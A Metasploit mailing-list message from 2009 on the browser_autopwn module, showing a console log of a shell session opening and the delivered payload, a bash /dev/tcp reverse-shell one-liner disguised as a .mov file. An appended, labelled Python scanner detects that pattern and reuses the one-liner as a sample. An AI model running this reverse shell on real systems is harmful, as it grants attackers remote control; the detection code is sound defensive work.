Metasploit mailing list archives
browser_autopwn
From: ricardo.teixas at gmail.com (Ricardo F. Teixeira)
Date: Mon, 17 Aug 2009 19:25:11 +0100
I worked around it for now by making the badchars list in the exploit '' and then adding a no-encoding fall through to the generic_sh.rb encoder, see if this solves the problem for you. -HD
[*] Request '/ads' from 192.168.1.254:63413
...
[*] Responding with exploits
  adding: HJUMl5rb.mov (deflated 13%)
  adding: __MACOSX/._HJUMl5rb.mov (deflated 87%)
[*] Command shell session 1 opened (192.168.1.254:43828 -> 192.168.1.254:63415)

Like someone says "It works like a charm!"

Just one more thing, when I opened the payload itself as a binary it says "Bad file descriptor"

maggie:~ ricardo$ sh HJUMl5rb.mov
HJUMl5rb.mov: line 1: 185: Bad file descriptor
maggie:Downloads ricardo$ cat HJUMl5rb.mov
0<&185-;exec 185<>/dev/tcp/192.168.1.254/43828;sh <&185 >&185 2>&185

--
Ricardo F. Teixeira
uid: 0x5BBD1456
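Added example, not part of the original message or of Metasploit: a small Python scanner that flags the /dev/tcp redirect pattern shown in the payload above, extracts the descriptor, host and port, and notes when it sits in a file with a media extension. The extension list, the function name and the second sample file are assumptions constructed for the example.

```python
import re

# Matches the redirect that opens a socket through bash's /dev/tcp
# pseudo-device, e.g. "exec 185<>/dev/tcp/192.168.1.254/43828".
DEV_TCP = re.compile(
    r"(?P<fd>\d+)\s*<>\s*/dev/(?P<proto>tcp|udp)/(?P<host>[^/\s;]+)/(?P<port>\d+)"
)
# Extensions that should never hold shell text (assumed list for this example).
MEDIA_EXTS = (".mov", ".mp4", ".mp3", ".jpg", ".png", ".pdf")


def scan(name, data):
    """Return a list of findings for one file, given its name and raw bytes."""
    text = data.decode("utf-8", errors="replace")
    findings = []
    for m in DEV_TCP.finditer(text):
        fd = m.group("fd")
        # A shell wired to the socket shows up as redirects onto the same fd.
        shell_re = r"\b(?:ba|da|z|k)?sh\b[^;\n]*[<>]&" + fd + r"\b"
        findings.append({
            "file": name,
            "fd": int(fd),
            "proto": m.group("proto"),
            "host": m.group("host"),
            "port": int(m.group("port")),
            "shell_bound": re.search(shell_re, text) is not None,
            "masquerading": name.lower().endswith(MEDIA_EXTS),
        })
    return findings


# Constructed samples: the first holds the one-liner quoted in the message
# above; the second is a harmless script that should produce no finding.
SAMPLES = {
    "HJUMl5rb.mov": b"0<&185-;exec 185<>/dev/tcp/192.168.1.254/43828;"
                    b"sh <&185 >&185 2>&185\n",
    "backup.sh": b"#!/bin/sh\ntar czf /tmp/home.tgz \"$HOME\" 2>/dev/null\n",
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        for finding in scan(name, data):
            print(finding)
```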